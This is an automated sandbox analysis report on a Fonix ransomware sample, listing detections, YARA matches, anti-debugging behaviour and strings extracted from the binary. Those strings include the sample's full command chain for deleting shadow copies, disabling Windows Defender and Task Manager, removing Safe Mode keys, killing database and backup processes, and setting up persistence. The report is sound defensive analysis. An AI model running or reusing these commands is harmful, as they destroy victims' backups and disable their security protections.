Analysis Report fM498uO16Z

Overview

General Information

Sample Name: fM498uO16Z (renamed file extension from none to exe)
Analysis ID: 338145
MD5: e7f086119362368528a160be01f194ad
SHA1: 996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256: e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d

Most interesting Screenshot:

Detection

Fonix
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: fM498uO16Z.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: fM498uO16Z.exe Virustotal: Detection: 56% Perma Link
Source: fM498uO16Z.exe Metadefender: Detection: 22% Perma Link
Source: fM498uO16Z.exe ReversingLabs: Detection: 55%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer, 0_2_011D89D0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, 0_2_011D8290
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext, 0_2_011D8AC0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, 0_2_011D8400
Source: fM498uO16Z.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
Source: fM498uO16Z.exe String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: fM498uO16Z.exe String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: fM498uO16Z.exe String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Fonix ransomware
Source: Yara match File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Yara detected Ransomware_Generic
Source: Yara match File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Deletes shadow drive data (may be related to ransomware)
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: fM498uO16Z.exe Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
May drop file containing decryption instructions (likely related to ransomware)
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: fM498uO16Z.exe Binary or memory string: How To Decrypt Files.hta\Help.txt

System Summary:

barindex
Detected potential crypto function
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122F14C 0_2_0122F14C
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B31B0 0_2_011B31B0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122F9E4 0_2_0122F9E4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012289F8 0_2_012289F8
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F880 0_2_0121F880
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01229888 0_2_01229888
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0118E0E0 0_2_0118E0E0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B1B40 0_2_011B1B40
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F394 0_2_0121F394
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0123A3FC 0_2_0123A3FC
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0118CAD0 0_2_0118CAD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01186D20 0_2_01186D20
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01195D40 0_2_01195D40
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D9590 0_2_011D9590
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011813F0 0_2_011813F0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122DD94 0_2_0122DD94
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B4DD0 0_2_011B4DD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01226400 0_2_01226400
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012154A4 0_2_012154A4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01221CAC 0_2_01221CAC
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011884A0 0_2_011884A0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01185CD0 0_2_01185CD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01190F80 0_2_01190F80
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01225784 0_2_01225784
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B27D0 0_2_011B27D0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F618 0_2_0121F618
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B4650 0_2_011B4650
Source: classification engine Classification label: mal84.rans.evad.winEXE@1/0@0/0
Source: fM498uO16Z.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fM498uO16Z.exe Virustotal: Detection: 56%
Source: fM498uO16Z.exe Metadefender: Detection: 22%
Source: fM498uO16Z.exe ReversingLabs: Detection: 55%
Source: fM498uO16Z.exe Static file information: File size 1266688 > 1048576
Source: fM498uO16Z.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe

Data Obfuscation:

barindex
PE file contains sections with non-standard names
Source: fM498uO16Z.exe Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01189877 push rbp; iretd 0_2_01189878

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_011F10F0

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: fM498uO16Z.exe Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: fM498uO16Z.exe Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_011F20B8
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_011F20B8
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012218C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_012218C8
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F2E0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_011F2E0C

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_012391B4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0123989C
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_01239284
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: try_get_function,GetLocaleInfoW, 0_2_0122D580
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_0122CFB0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_01238E68
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_012396C0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F32D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_011F32D0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338145 Sample: fM498uO16Z Startdate: 11/01/2021 Architecture: WINDOWS Score: 84 7 Antivirus / Scanner detection for submitted sample 2->7 9 Multi AV Scanner detection for submitted file 2->9 11 Yara detected Fonix ransomware 2->11 13 4 other signatures 2->13 5 fM498uO16Z.exe 2->5         started        process3
No contacted IP infos